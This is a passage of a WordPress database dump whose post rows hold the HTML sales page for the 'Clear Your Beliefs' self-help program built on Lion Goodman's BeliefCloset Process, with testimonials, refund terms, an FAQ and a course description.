do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 03:10:16', '2014-12-11 08:10:16', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2003, 2, '2014-12-11 19:21:42', '2014-12-12 00:21:42', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 